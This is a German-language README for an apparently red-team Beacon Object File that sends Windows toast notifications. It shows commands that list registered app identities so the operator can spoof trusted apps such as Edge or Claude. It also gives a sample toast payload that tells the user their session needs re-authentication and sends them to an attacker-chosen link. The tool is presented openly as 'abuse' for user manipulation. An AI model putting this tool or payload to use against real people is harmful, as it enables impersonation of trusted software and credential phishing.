
Missbrauch von Windows-Toast-Benachrichtigungen für Spaß und Benutzermanipulation
Eine Beacon Object File (BOF) zum Senden von Windows-Toast-Benachrichtigungen. Ergänzt den Blogbeitrag für vollständigen Kontext und Anwendungsfälle.
Listet die auf dem System registrierten AUMIDs (Application User Model IDs) auf. Verwenden Sie dies, um eine geeignete Identität zu finden, die Sie vor dem Senden einer Toast-Benachrichtigung ausleihen können.
inline-execute toastnotify.o go getaumid
Beispielausgabe:
[Notifications\Settings - HKCU]
Microsoft.Windows.Explorer
MSEdge
com.squirrel.AnthropicClaude.claude
...
[Notifications\Settings - HKLM]
...
com.squirrel.AnthropicClaude.claude
...
Sendet eine Standard-Toast-Benachrichtigung mit Titel und Text. Erstellt das XML intern mit ToastGeneric.
inline-execute toastnotify.o go sendtoast "MSEdge" "Title" "Notification body"
Sendet eine Toast-Benachrichtigung aus einer beliebigen XML-Nutzlast, die in Base64 kodiert ist. Hier passiert das Interessante mit vollständiger Template-Unterstützung: Aktionen, Protokoll-Links, Bilder, Fortschrittsbalken, Auswahlfelder, Hero-Bilder. Und dafür gibt es eine App!
inline-execute toastnotify.o go custom "MSEdge" "<base64-encoded-xml>"
Beispielnutzlast vor der Kodierung:
<toast>
<visual>
<binding template="ToastGeneric">
<text>Action Required</text>
<text>Your session requires re-authentication. Click to continue.</text>
</binding>
</visual>
<actions>
<action content="Continue"
activationType="protocol"
arguments="https://your-page-here.com"/>
</actions>
</toast>
Kodieren Sie es und genießen Sie es.